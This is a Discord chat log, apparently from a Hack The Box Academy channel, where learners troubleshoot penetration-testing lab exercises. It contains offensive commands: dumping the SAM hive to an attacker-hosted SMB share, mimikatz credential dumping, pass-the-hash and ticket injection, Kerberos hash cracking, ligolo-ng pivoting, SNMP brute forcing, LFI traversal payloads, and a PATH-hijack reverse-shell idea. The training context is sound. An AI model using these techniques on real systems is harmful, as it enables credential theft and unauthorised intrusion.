#modules

Any Linux users here?

TempleOS

also https://dontasktoask.com

Huh?

"any linux users here" is a very broad question if you're looking for a specific answer

read the link, it's actually informative

Also is Kali Linux a good website or just for the hackers who aren't working for cybersec

Kali is a linux distro not a site. Its for anyone but has lots of tools built in for people that that are interested in this stuff. I would probably do some beginner Linux courses/ modules and get a feel for it.

Kali is a pentest driven distro

but at it's core, it's debian based - meaning any tool that can be installed on any other Debian Distro will install on any other one

https://kalilinux.com/

See?

https://www.kali.org/

that's the official one

.

yeah and kalilinux just redirects to kali.org

it's still a distro

:) that's just the official website of the distro

Also is Kali Linux for both the hackers aka white hate hackers who are cybersec and black hat hackers who are , yk , unethical hackers

like https://parrotsec.org

the site is just where you would go read about kali and download it

it's for anyone

¯_(ツ)_/¯

there's no restrictions based on what "type" of hacker someone is

Anyone ?

How come?

It also says cybersec

it doesn't matter ¯_(ツ)_/¯

i suggest you do the infosec fundamentals module

the tools exist for those that know/learn how to use them

path*

Im not there yet but try to use one of the many cracking sites or a new word list? No idea as I have not done this part yet. Is it saying to crack the hash? Could be that you need to pth or something?

Also since I am new , what can we really do in HTB? Just training , that's it? We can't participate in real life stuffs?

HTB is a training/practice site

there's some CTFs that HTB will host

What's ctf?

but as far as "real life" if you're referring to 'hacking a company' or doing a bug bounty then you have to follow that company's Bounty program

every company lays out scopes of bounties differently

but if you're just trying to learn how to hack your neighbours wifi, your frame of mind is too small

Yes i tried to pth also, not working...

Nah I mean I wanna compete

I wanna compete with people who try to hack others and stuff

CTF events is where people compete for the most part. Start slow and get the foundations. Stay consistent it will take a while to get to that level.

I don't have a pc nor a laptop so, maybe next year

It would be hard to study without that. You can still keep up with cyber sec news and watch vids untill you can get a pc

Hmm

buying a cheap laptop and installing a linux distro directly on it is one way to start

~$200 laptops will get you pretty far for cheap

Seems like it, I cant log in

some people are using stuff that's like ~10 years old

yep lookin like @urban sage broke academy

To add to this I have sold hundreds of old company laptops on ebay for $100 in the past so you could look there

yep; usually when companies cycle through their laptops they'll resell the old ones for a fairly decent price

because it's usually ~4 years old

ours were more like 10 years old but yea lol

had win 7 on them

at least if they're buying through Dell, due to warranty type stuff

i.e. cheaper to buy a new set of systems with warranties than to renew warranty for only up to another year or two of hardware support

¯_(ツ)_/¯

Guys anybody know where is actual worldlist in the seclists-master

i mean SecLists has a bunch of different wordlists categorized

the "Ligolo-ng" doesn't work as well in that specific Double- pivoting (Dante-lab)

I want to brute force on web directory so which file is that ?

Why ? Haven't tested, but if you have 2 tunnel devices, and proper routing, should work

maybe this one?
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/directory-list-2.3-medium.txt

right, should

https://systemweakness.com/pivoting-for-newbies-with-ligolo-ng-82f13040aa39

https://arth0s.medium.com/ligolo-ng-pivoting-reverse-shells-and-file-transfers-6bfb54593fa5

https://software-sinner.medium.com/how-to-tunnel-and-pivot-networks-using-ligolo-ng-cf828e59e740

non did the trick

sudo ip tuntap add user kali mode tun ligolo
sudo ip tuntap add user kali mode tun ligolo2
sudo ip link set ligolo up
sudo ip link set ligolo2 up
sudo ip route add 172.16.6.0/24 dev ligolo
sudo ip route add 172.16.7.0/24 dev ligolo2
sudo ./proxylin64 -selfcert -laddr 0.0.0.0:4444
sudo ./proxylin64 -selfcert -laddr 0.0.0.0:4445

In 2nd ligolo, use "start --tun ligolo2"

that's theory 🙂

also you need to add a listener on ligolo1 session

yes
followed :
https://arth0s.medium.com/ligolo-ng-pivoting-reverse-shells-and-file-transfers-6bfb54593fa5

I probably have broken something today but it wasn't Academy I swear.

Hey has anyone completed the Introduction to Windows Command Line?

i try enumerate all community chain but nothing in output :https://academy.hackthebox.com/module/112/section/1080

can you ping this IP ? Seems connectivity issues

yes he work

that’s because you have the wrong community string

i brute force the community string but nothing

Log in to the ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL Domain Controller using the Domain Admin account password submitted for question #2 and submit the contents of the flag.txt file on the Administrator desktop.

Why I had to use this command to make this work, can someone explain.
psexec.py FREIGHTLOGISTICS.LOCAL/sapsso@academy-ea-dc03.inlanefreight.local -target-ip 172.16.5.238
instead of this psexec.py FREIGHTLOGISTICS.LOCAL/sappso@ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -target-ip 172.16.5.238
Question says to connect to freightlogistics.local

try the tool onesixtyone

shit it was the wordlist that wasn't good i found a lead

anyone mind helping a noob lol. I connected the vpn and everything and was able to start up a machine but then when i ping the ip I get no connection. Anybody know why?

What issue are you having?

ran ||agent.exe -connect <MY_IP>:11601 -ignore-cert||
got session on my attack host

also I didn't open a listener ...
on the first agent ...

since both of the host R on the same network...

Trying to go to the second network that only one of the host can go there

Tbh haven't gotten this error before, might have something to do with the latest release, if you've got two connections going, can you switch between them with session?

yes

but can't start the secone one

You might need to stop the tunnel you've got running to start the new one

can I dm you about it, if youve done it? I am just having a hard time how to exploit the CORS header. the endpoints in the lab don't make sense with the walk though and I am already still a little confused on CORS after reading extra material.

but then I'm closing the access to the second host, since the first one is my ticket to the internal network

The agent won't disconnect iirc

then I'm not sure how to close the tunneling that u mean...

You pick your session, then type start right? It writes "starting tunnel to...", there's also a stop command

Try that, experiment a little, or try running the 2nd agent through a listener on the first one (think it was what I was doing in the guide)

I should also check out the newest release to see wether anything else has changed, apart from being able to do port forwarding now

Yes, but go and eat something first.
I've finished the section, but not the whole module yet

sounds good, thanks

the listener method didn't worked as well ...

@umbral fulcrum Might be some firewall restrictions in place, you can run ligolo on a different port than the default with -laddr as shown here (your best bets are ports like 80, 443, 445), try that, but you can also create a 2nd ligolo interface again as shown by bmigette

It's super flexible, all the guides including mine cover the basics, but there's a lot you can fine-tune

thanks for everything guys !

Hi, I’m in the 8th question of the second skill assessment in Active Directory Enumeration & Attacks .
the question is :
Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
apparently i have to pass the hash and i feel confident that i have tried more than 7 or 8 pass the hash techniques but none of them worked . i already have the hash of the Administrator account but it just does not work . any help would be appreciated

i have an issue with evil-winrm but i can not find the solution on the HTB forums nor on google .

ok, messaged you.

nothing works

don't know what else is there...

there R 2 options left either I missed something critical (don't know where else to look)
OR
the option for "ligolo-ng" isn't possible against the target (not likely)

Anyone can help me with the File Inclusion assessment ? I managed to get the source of index.php page, but then i'm stuck 😄

Check my messages from earlier this afternoon 😉

What "issue"

thanks

Hi everyone, I'm on the password module, and in particular in the module: ''attacking sam'', now I execute these commands, as described in the module:
reg.exe save hklm\sam C:\sam.save
I do the same with system and security
after which I open the smb server with the command said in the module:
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/

after that, when from the windows terminal I go with move sam.save \10.10.15.16\CompData it tells me
access denied, 0 files moved,
where is the problem??? Can anyone help me please?

can not connect . more specifically, the error message, Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError . i also ran it with ruby 2.7 in another machine but still nothing

Also remember the user hash is the NT part of the NTLM_V2 hash

i dumped the hash with mimikatz its only one hash

It says this is the wrong answer but this is the result I got from both nmap -sC -sV and after connecting to the server anonymously ****

When in doubt, enumerate your hashes again

Is there a specific way that the module wants the answer formatted or something?

what mimikatz command did you used

220 is a status code

think about me please ❤️

No

Right but it says the whole banner. Plus I also tried submitting "FTP V1,1" and it still didnt work

lsadump::lsa /inject

marciel thanks you, you are very helpfull bro

You're so close

220 is the only thing you can ignore in that response

Try logonpasswords and see what you can find

Not sure waht this does, but does not seem to extract hashes. Check my message about mimikatz 😉

"220 is a status code" It finally clicked after you said that lol thank you for the tip

okay

I'd recommend deleting the screenshots as they're a spoiler

pleeeeeeeeeeeeeeeeaaaaaaaaaaseeeeeeeeeeeeeee

heeeeeeeeeeeeelp me

help about what?

i tried logon passwords . nothing

Hi everyone, I'm on the password module, and in particular in the module: ''attacking sam'', now I execute these commands, as described in the module:
reg.exe save hklm\sam C:\sam.save
I do the same with system and security
after which I open the smb server with the command said in the module:
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/

after that, when from the windows terminal I go with move sam.save \10.10.15.16\CompData it tells me
access denied, 0 files moved,

will do now

i dont understand why win tell me access denied, what i can do?

move c:\sam.save \\10.10.15.16\CompData

understand the command and its parameters

once you've done that, it will instanteneously click what you are doing wrong

I did this, and it gives me the same answer.

Do you have access to save in c:\?

yet the form is clear, it says to create a copy of sam, etc. open the smb server and transfer the files, I don't understand why it tells me access denied,

Also is 10.10.15.16 your tun0 ip?

its literally the same ip as the cource

I didn't check

yes, I also tried to copy and paste the files from two machines but it won't let me

I'm doing the Thick Client attacks module right now and can't seem to open PowerShell at all, and this is preventing me from running the relevant script to create the exe I need to debug. Is this intended? I have restarted the machine and it didn't seem to fix anything

Did you read my previous message

no like its literally the same one

lol

You need to use your tun0 ip

obviously for reasons related to people's trust I didn't put my IP

but in the command I put my IP

ah ok

then you can say {my_ip} ¯_(ツ)_/¯

sorry

Because we have seen a fair share of people be dumb

I took it for granted that I don't put my IP online, especially in a group full of hackers

¯_(ツ)_/¯

btw, i dont know what i do

any hints?

Use other file transfer methods maybe

like which one?

Xfreerdp for instance allows you to mount a directory with /drive:

did you also update the /home/ltnbob/Documents/

since that is as default as well

same as cource

but do I have to create these folders??

no

ah ok

you can do this instead to make it easier and check

Try moving the same.save to another folder the user has access to

Hey HTB team, when you guys are going to create a detailed module on Curl?

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData ./

see if that works. using the move cmd with your ip

just one moment

the last command you used for impacket-smbserver was telling the smb to be hosted in that directory. But you probably pointed to a non existent one which wouldnt work

^

Don't just copy/paste commands

this command does not work

However, I don't copy and paste commands like that, I use some tools that explain to me in detail what they do and how they work, in other words I study them

works fine for me

what do you get back

then if I don't understand it's obvious that I ask for information

missing a space between CompData and ./

You forgot the space after CompData

I want hack's do anyone know some good ones

Google

This isn't a rando hacker4hire server @fleet cairn read #welcome and #rules

now I try to transfer the files to the desktop and try move again. anyway I google before asking, I hate asking because I find arrogant people like you who don't help anything. Only when I don't find what I'm looking for, I use this platform

ok sorry, now it works

thanks man . worked

Wasn't referring to you dude

I was replying to the dude asking for "hack's"

ok sorry man, i hate when i ask for a help and the ppeople jokes me

Nah your issue seemed legit, we just didn't have enough context at first to confirm what part was the issue

anyway that xfreerdp closes every two seconds, I'm trying to do and vi day friends

no problem. The /home/USERNAME/Documents is a path for a specific user. Sometimes something small like that can ruin everything. Nothing wrong with asking for help just make sure we are provided with enough information to help 🙂

If you have RDP, I'd go with MS RDP client and just copy / paste the file this way 🙂

you can do that just as fine with xfreerdp tho

if you just share the drive

Maybe, I Never used xfreerdp, I usually do a tunnel like that ssh -L 3390:172.16.7.50:3389 babadmin@192.168.1.66 and then RDP from my windows box to the lab vm (127.0.0.1:3390 in this case). That is what I found to be easiest for me 🙂

yeah. A nice trick to use ssh dynamic port forwarding instead. This way you can use proxychains to execute within the same internal network as the "ssh" party

i usually do something like this for rdp

ssh user@ip -D 9050
proxychains xfreerdp /v:host /u:user /p:password /drive:linux,/home/user/

Since by default proxychains goes over the port 9050

the module said to use xfreerdp, that's why I'm using it, however it's going very slow, so I'm taking a long time to give you an output

yup

Use the tcp vpn download

^

Or change regions (still use the tcp)

i dont use parrot by htb, i use my kali

OK?

That doesn't really matter for the vpn. Sometimes the node is unstable so changing the region helps

it tell me ''the network path was not found

ah ok, good to know

I didn't solve anything 😦

Changing vpn region you'd need to reset the target btw

i dont have changed anything right now, must do it?

Might need to uncomment the proxy mode line for it.

it end with CompData

do

// instead i guess

Add a \ after CompData

Hello everyone, I’m new here, completely new to this world. So knew I’m having trouble figuring out a password issue on the first question on operating systems fundamentals 🤦🏽‍♂️ is there anyone that might be able to help me figure it out? It’s embarrassing, it’s a tier 0 module.

What's the issue exactly

If it's that the password isn't displayed while typing: that's normal

It’s on Linux, I’m doing an ssh and I have the username and ip, the password is provided but it keeps denying me access

C:\Users\bob\Desktop>move sam.save \ip\CompData
The network path was not found.

Took me about an hour to figure that out lol

You need to do ctrl-shift-v to paste in linux terminal

Thank you, I’ll try that. Also the password provided is written in red, does that mean anything?

No.

🙏🏼 thank you

It's just to differentiate it from the username

I was going nuts, thought it was some kinda riddle

ok guys, I have to go, I'll try again tomorrow to do more tests, in any case if I can't write here, ''thanks for the help''

I had same issues in the AD lab yesterday. I spent a good hour trying to understand that. What I noticed is that to use smb share in windows, you might need to do net use \\xxxx\yyyfirst, or even map as a net drive via net use x: \\xxxx\yyy.

Also, depending your reverse shell, it might not show the error output (does not seem to be your case tho)

In the end got fed up and uploaded nc.exe on windows device and used netcat to get files I needed

This is a direct rdp session

bro it took me ages to realize that

oh my f--ing god

Alguien que hable español?

Solo Ingles #rules

Ok

hi guys im on password attcks kerberos::ptt "C:\tools[0;58e1a]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi" it says ok it did it then i exit and go to powershell but i still not change?

guys can someone help me here? "Using metasploit framework" module Sessions & jobs

tried to use the exploit

and got a TTY shell

u shud look for diff exploit

I got a TTY shell and tried privesc

I tried the php one but its not vulnerable

u need to keep looking

its some weird exploit

hi

kinda stuck on the footprinting hard lab

got to "see" some stuff from SNMP, but nth more

Hey all, got a question on a technique learned from the windows module. I'm attempting to use the PSUpload.ps1 script to upload a file to my attack machine, but am getting hit with errors. Not sure if I am invoking the script directly:

why doesnt this work [18:17:13:676] [1845:1846] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[18:17:13:676] [1845:1846] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[18:17:13:676] [1845:1846] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[18:17:13:676] [1845:1846] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
i treid to freerdp password attacks i had it then it rrandomly exited

Just want to say thank you, I was able to complete that section thanks to your help.

Ahh, i was invoking it wrong after all, geez

. ./script.ps1, for those that have invoking issues in the future LOL

you have to wait a little bit for the snmp output to show you the next step 😉

got it

🙂 but it doesnt make sense

1.* should be the same as 1.2.* or am i wrong? 🙃

my target spawn is taking forever to load?

i don’t think i understand your question

iso is the root oid followed by the sub oids 3. … and their corresponding values

iirc

i meant that when i did 1.* i didnt get anything but 1.2.* gave me "stuff"

Hey amy power shell experts willing to help a noob?

is htb target down for anyone else

can u guys spawn target us?

bruh that was too easy 🙂

i suffered with snmp wayyy more

i recommend not specifying an oid it’ll query the snmp mib from the starting point

as snmpwalk does not support regex for oid query

can u explain pls?

so u mean when bruteforcing it, if we didnt specify and oid it would start from the beginning anyway?

yes think of it like querying the entire snmp tree on the device 😉

oh

cant get past the footprinting medium module

i just finished

i can't get rdp in

litteraly just submitted the hard lab flag

lets go

try using TCP vpn file

bet

it worked for me

yup taking forever

do you have a custom or a good tool kit you use for enumeration

i use auto recon

I use eu servers and it works ifne

nope still not working

i think im not qualified enough to answer such question 😅 😂

what is it ur getting?

like just lagging? or what

toolkit? just use the right tool for the system, there's no set tool to use, other than nmap I guess

18:40:12:501] [10741:10742] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[18:40:12:502] [10741:10742] [WARN][com.freerdp.crypto] - CN = WINMEDIUM
[18:40:12:706] [10741:10742] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[18:40:12:707] [10741:10742] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[18:40:12:707] [10741:10742] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[18:40:12:707] [10741:10742] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1

looks like your creds are wrong

^

same error i was gettin

wrap the password in " "

Single quotes

it prolly has ! which is causing linux shell to do some stuff

wrap in three ` next time

Double quotes can still be interpreted

oh

+1 pls 😂

i tried still nothing

i pass the ticket in password dattacks but kerberos::ptt "C:\tools[0;5a1ef]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi" it says file ok then i go check whoami im still admin??

$ is a variable call
! is history

This looks weird to me imo but could be formatting in discord

yeah but why " " get interpreted?

Single quotes are string literal

Meaning it doesn't attempt to interpret it as anything but text

o i c its dobule quote

You can still pass commands and variables through double quotes

thanks

i use to become john i do it and it says file ok then i exit mimikatz but i still same perso

When you launch a shell using the mimikatz method you should be able to to access the share

regarding the linux priv escalation module my user has one of the env path writable by us and the root is runing awk every 3 minutes without the absolute path can i write awk inside this dir so when the root excute awk i can get reverse shell as root

im stuck

i cant get past it

xfreerdp?

yea

There should be a /cert-ignore

Or something

still didnt work

like wtf everytime it works for everyone else besides me

what's the full rdp command? and module and section

that's why i hate doing exams the stuff that is taught in the class dont work

stop getting furastrated its okay

xfreerdp /u: /p: /v:

Try putting /v: first?

no difference i think

Or try using remmina

Sometimes it's stupid

yeah that could work ig

what module and section?

What creds are u using

remmina didnt work either

anyway, good night everyone im dying here 😂

good night bro

and good luck bro, hope it works

thanks bro

That’s not the correct pass

how do you know what module and section it is can't remember an alex user

try not to connect using /p:___ and just manually input the pass

footprinting module

So it has nothing to do with stuff in the class not working, or it only working for everyone else 🤷🏼‍♂️

when it ask

Footprinting medium

i tried adding the !mD and it wont work still

Footprinting medium. Alex, mssql

Wrap it in single quotes

Single quotes

The password

^

ah it's been a while since that module

server hostname was not specified with /v:server port

What

You don’t do that

Then you should specify

error: server hostname was not specified with /v:<server>[:port]

You don't need to add port btw

Just put the ip

Considering its default

i didnt think so

nope still not working

this is annoying as fuck

What’s your command

Full new command you're using?

Space after the second quote

Space between ' and /

Lmao immediately fir both of us

thank you it finally worked

this is why i hate linux

This has nothing to do with Linux

Delete the command here: spoiler

Just with you not reading the command lol

And providing the wrong password

Has nothing to do with linux, you just missed something

If I keep trying to log in with the wrong password on windows it won’t work either

linux just has you be perfect with the quotes and slashes

its annoying

So read instead of rush😄

Does anyone know how to do this task in the introduction to windows command line?????
"For this level, you must successfully authenticate to the Domain Controller host at 172.16.5.155 via SSH after first authenticating to the target host. This host seems to have several PowerShell modules loaded, and this user's flag is hidden in one of them."

Being case sensitive reduces mistakes

Authenticate to the 10.129.x.x target, then from there ssh to 172.16.5.155

how do I find the username of the DC?

It's the same as this user in question

Same password

Thank you so much

Critical thinking hurts the brain

Lol I have been working on this module for 3 days staring at the same terminal messes me up XD

Engaging braincells can be difficult lol

now i cant figure out how to nav SQL servers

like bruh

First you need the right permissions

i got admin already

👍

Just click around

Otherwise you can look up mssql commands (attacking common services goes over more of the command line stuff)

i cant find it man

fuck sql

Just gotta literally click around until you find the table

Then "view last 200 entries" or sth like that

nope i cant find it

i give up

it takes maybe a few minutes of clicking ¯_(ツ)_/¯

where i clicked up and down the whole list

Expanding sections/databases helps

been doing that too looked up accounts creds databases etc nothing

it definitely exists ¯_(ツ)_/¯

Take a step away and come back to it in a bit

I think part of your current frustration has something to do with the rdp stuff earlier getting to you a bit. And wanting to just be done

or you can just write a simple query to grab the flag, no need for manual digging

That too, simple queries aren't taught in footprinting unfortunately

But easy to find on google

i cant find it between SQL sucks ass and my Kali VM freezes for no reason what so ever

Could be the vpn being dumb if you ping the machine what's the avg response time?

nah like my entire kali vm freezes all the time for no reason at all

^

That's actually a legit thing 17.5 is dumb as fuck

Are you also dedicating enough resources to the vm

Bc a vm doesn't just freeze up "for no reason"

yea

i am yea i did downgrade it tho

What version are you currently using

its running 15.x rn

why not just go back to 17.0.2 instead of 15?

where do you enter those config changes at i have never went into the config file before

17.0.2 isnt a option for me just 16.2

the vmx file in the vm folder

what

i cant downgrade to 17.0.2

unless thats just 17.x

why can't you downgrade? just uninstall 17.5 and install 17.0.2

i got the pro version idk if that means anything

so do I

i can just change the hardware compatibility and thats it right?

im not a VM master lol

yep

bet

and most optimal processors and ram for the VM?

whatever you can spare

Safest allocation is 50% of host, but it depends on setup

i just use the one

i have 64GB of ram but i have it using 16

8GB of ram and 1-2 cores tends to be fine

Hey @proud pine quick question, did you compile ligolo. Or just use the precompiled binaries

I decided to step back and do Academy. I'm doing a Linux Fundamental module and am currently stuck on something. When doing a module that required SSH I used the sudo su command attempting to locate a direction and a notification came up that has me concerned. "This incident will be reported"

Realistically speaking how long will it take to make it all the way to Dante? Assuming that I don't have a job and nothing but free time?

depends on your skill level

Okay, just wanted to make sure I wasn't gonna get banned for accidentally breaking a rule

I'm supposed to be finding a path to a directory and I thought I'd have to reach its root to find it

My skill level is 18% on the penetration testing path for cpts 64% on the comptia pentes + in tryhacme

that.. doesn't mean anything to me, the individual boxes on dante are similar to easy on the main platform

I'd even say the easy boxes now are a a bit harder than dante

Geez, was starting to feel really stupid that I couldn't progress, and I feel even stupider for not trying the env command

holy hell pwnbox is freezing all of a sudden

You seem pretty knowledgeable what is your power level?

check season 3 leaderboard ig

also you can ask what people feel about it in #prolabs-dante

Refresh the page

I completed the module. But considering I can only use Pwnbox one time per day, am I limited to using my own computer's terminals for further modules?

build your own vm

the getting started module goes through that

There's a whole Setting Up module too

how 🙃

spend every weekend doing a box

@next bronze I have acquired ligolo now time to shenanigan

well.. I'm sure it's amazing, but how do I check the leaderboard

https://app.hackthebox.com/competitive/3/overview

7th huh

nice, the new update is sick, multiple tunnels now, makes double pivot much easier

Ye just going through the pivoting module to check it out lol

can you use your rewards to buy cubes, or platinum?

Or is that only for silver/gold?

for academy it's annual plans only, which are useless to me

I'll just get a free month of prolab

what's the level of box you need to be comfortable with to pass cpts

skills in boxes don't translate to the exam

there are many things you need to do in cpts which you won't find in boxes: networked environment, postex enum, lateral movement, etc

yeah the exam is more like a prolab , but what it takes to solve meduim/hard machines ?

research, perseverance, headbang against the box

so you don't need a crazy knowledge

knowledge comes from researching, if you already know them then it's a lot easier

okay , I got you

Hey @next bronze you've used ligolo a bit yeah? I'm having a hard time adding the 172.x.x.x interface (invalid prefix)

the ip route add command?

Ya

it needs to be the first ip of the subnet, e.g 172.16.7.0/24 works, but not 172.16.7.10/24

Yeah this subnet is 172.16.5.129/23 on the ifconfig

So I think I'm just stupid

ah use /24 would be easier, so 172.16.5.0/24, if it's /23 then it should be 172.16.4.0/23

I swear I tried that

Flawless victory

got it?

I am doing a final lab on LFI.
I have found two parameters. The parameter page in the link http://83.136.253.251:36016/index.php?page=about is suspicious. I could not bypass the filter that is filtering .., directory traversal, and is appending .php. Though I can see the code of index.php by putting the value of page=php://filter/convert.base64-encode/resource=index
Second, I have another link on the same website; http://83.136.253.251:36016/ilf_admin/index.php?log=../../../../../../../../../../../../../../etc/passwd. As you can see, I can do directory traversal and can see the content of /etc/passwd, however I can not read index.php file source code by using php://filter/convert.base64-encode/resource=index.php. I also tried different variants... e.g php://filter/convert.base64-encode/resource=lfi_admin/index.php. Can you explain why??? underlying webserver is nginx.

I actually didn't use ligolo at all.

Though, if you want to try the method I used, shoot me a ping and I can hook you up.

I always compile golang tools

I'm just testing it out in the pivoting module

So far it's a bit of work however it's a lot smoother

I made a little 3 line shell script that takes a network as an argument and does all the ligolo device and route setup

Hi!! Currently into adcs training... in trouble with esc4 exercice im not able to get molly file... tryied with cifs tgs from rubeus from administrator and molly. Tryied some other altservice.... cant figure out what i do wrong.

Got access to molly ntlm and administrator ntlm too

if you have the admin hash you can get the last question

if that's what you're stuck on

But sould i be able to get the file with the tgt and tgs from administrator certificate gain from abusing esc4

Or... i must ask another tgt/tgs with that ntlm using rc4

I'm not sure what you're asking. if you used Rubeus.exe asktgt /user:administrator /certificate:admin-esc4.pfx /getcredentials, you will get the admin's hash, then just pth

oh i get it,you can use Rubeus.exe asktgt /user:administrator /certificate:admin-esc4.pfx /ptt to inject the ticket into your current session, then you can get the last flag that way

is anyone that has completed the skills assement 2 for Deserialiation intro able to give me a nudge? 3 days on this and starting to go crazy.

in the section ACL Abuse Tactics of ACTIVE DIRECTORY ENUMERATION & ATTACKS module what is the password file to crack adunn? rockyou?

I believe that's what I used

thanks, it just doesn't want to crack for me

maybe I have a options wrong? hashcat -m 13100 rubeus_adunn.txt -a 3 /usr/share/wordlists/rockyou.txt --force --potfile-disable -o cracked.txt

wrong attack mode, 0 for wordlist

https://hashcat.net/wiki/

core attack modes

hashcat -m 13100 rubeus_adunn.txt -a 0 /usr/share/wordlists/rockyou.txt --force --potfile-disable -o cracked.txt

You don't need to disable potfile btw for output

hashcat -m 13100 rubeus_adunn.txt -a 0 /usr/share/wordlists/rockyou.txt -o cracked.txt

That should work

Also fwiw one of the main devs has said: never use --force

great thanks, firing the lab back up

much success!

hey anyone had trouble with the last question on module windows command line last question on assessment

i hhave piped and done command

but every user I put in in relation to 6425 EventID doesnt work

now im stuck on footprinting hard

Read the engagement closely and look at udp

i got the udp already

idk what to do now

i ran the snmp walk and the other one

onesixtyone

Well if you don't know the community string, you should probably look for that first

i got a string a with nmap

And onesixtyone will definitely output it

all it gave me was a banner

["String"]

And snmpwalk or braa will get you the output of an interesting thing

braa dont work for me for some reason

What's your braa command

snmp walk gave me the best output of timeout no response

braa walk /usr/share/wordlists/seclists/Discovery/SNMP/common-snmp-community-strings@10.129.202.20

Bruh

i tried it without walk too

Why are you throwing the whole list at it

If you properly enumerated it, you'd have the string :)

is this what it looks like? 5b99e75a10288b6100000000

No

welp

The community string is a plaintext string

onesixtyone will give you the answer

ip [string] blah blah blah

hit it with another nmap scan?

No

You already have your start

Use tools that are at your disposal, this is literally the foothold lol

yea im lost i just tried onesixtyone and nothing happened 🤦‍♂️

What is your onesixtyone command?

onesixtyone -i

? Why i

idk which other one to use

this is aids

My brother in christ

Read the snmp section

yea i was throwing the list at it

i is for a file with a list of hosts

it says -c

Yep and it gives you a pretty good wordlist to use

it said it couldnt find that file

i keep confusing snmp with smtp for some reason. Always jump to mail lol

Then that file might not be in that location

locate SecLists

Or locate snmp.txt

seclists doesnt come default

so you would need to download it of gitty

It probably mentions that somewhere

yee

but ik like most sections that reference SecLists has a link ¯_(ツ)_/¯

yea i did i found it

but it only gives me a banner

Then use that file path of where your SecLists is

Screenshot now, show it

What's the output

nvm this list gave me nothing

Bc I can 99% guarantee you overlooked the onesixtyone output

Screenshot of the output: now

That list seems small but that's not the full output is it?

nah thats the full output

then i got this

Wrong wordlist

Ah

Yep that'll be the one

tf am i gonna do with this

...

So you know how the examples use "public"

Use your braincells to connect the dots

they have left the building

OK so. If the examples use "public" but you have a different word

Literally the word In The Brackets

anyone please dm me for help i have got in I dont want to post command but i have multiple users coming up

As I pointed out earlier

Gonna need to be specific m8 what module and section

introduction to windows command line

last question in assessment

with eventID log

4625

Don't narrow your output to users that just exist on the system

i tried every user already

@fathom pendant how many modules have you done lol

Attackers don't always know what users exist

i put in private and get a gigantic lists of random names

Not enough, I'm forcing myself now to actually finish ad enum

i guess if you focus on a lot of certs. you do a loooooot

why are you using "private"

The string you're looking for is staring you straight in the face

well public gave me a useless banner

@winter arrow what is the response of the tool. What are the question to your task

Evaluate the onesixtyone output that didn't just give you nothing

Look very closely at it

Stare at it until it clicks

Reread the engagement paragraph for this assessment if you have to

Yeah I have the full output for event 4625 in term

then i even rdp into event logger

it might be time for another adderall

no luck

Don't abuse substances

if you are on adderall you prob just need sleep

I'll give you another hint [b..p]

yea tru

Get some rest and maybe it'll click in the morning

not worth getting points if your not going to remember it the day after

now there is nothing there

has anyone does this

@severe eagle sorry. i havent done that module

intro to windows command line that can give me hint who

I told you. You need to look at all the outputs

yeah I have been

Don't filter any names out of it

for about 3 hours now before coming on here

are you running the command on DC?

now from user10

okay i finally got a output but idk what now

The username starts with j

thank you

You mean output from braa or snmpwalk?

no just onesixtyone

Ok

because VMware decided to be funny and freeze again

Now the word is between the []

okay i see it now

Good 👍

now what?

Now use either braa or snmpwalk with that string instead of "public" from the examples

And you'll get an output of a command that looks like it could be creds

now i get error opening community file name

Show command

Full command

vmware keyboard stuck again hang on

no luck

i dont have anyone in users with j

Show your command

to get the message which user

Are you running that on the domain controller?

na will connect now and try

That's why

Literally what @next bronze said earlier iirc

Yall got to remember if you dont show commands or errors its like sending a message to a mechanic saying "why doesnt my car start". We have no debugging information to help, and we dont have access to your "car"/terminal

Yup. Command didn't look wrong, so they were just looking in the wrong place

Read the section again, and refrain from posting spoilers about the exercises please

omg thank you MarcieLee hahahah

got it straight away

@winter arrow onesixtyone is for finding strings, braa or snmpwalk from here

I suggest taking a break tbh

Hi sirg I'm just redoing modules for the 10000th time xD

(I'm just waiting on a thing to run in ad enum)

Got Ligolo set up, works seamlessly

ooooo

how is it?

i heard its sweet af

especially for jumpboxes

Pretty good tbh, and seamless. Practiced on the pivoting module to get used to it. Doesn't require any elevated privileges to use

thats nice. i feel like its going to make tunneling so much better. Specially when you have like 2-3 networks to pivot into

Might f around and learn go to make switching between initiated sessions easier

okay now what i got the string

Honestly go re-read the snmp section

And maybe update notes if you're taking any

yea i got the cheat sheet downloaded

and added some extra stuff

well, reread the question at least

This is the hard skills assesment

It combines a handful of things from the module to get the answer

If you read the section regarding snmp the next step is pretty straightforward

yea thats what i thought too i thought it was rwcommunity

ah alr. But i mean. hard or hard its going to be in the module regardless. If its about sntp its probably going to be in the sntp section

which module is this?

the footprinting hard lab

i just want past this stupid part

it’s really not that complicated

i tend to overthink things sometimes i think

that's one of the many reasons i love the autorecon plugin but hopefully it'll get more developed

Autorecon is a crutch

You should be able to manually verify automated results for false positives

true

but doing it manually is the equivlent of E minor

Still. Knowing how it works is important

Auto tools are nice once you grasp the manual concept

true that

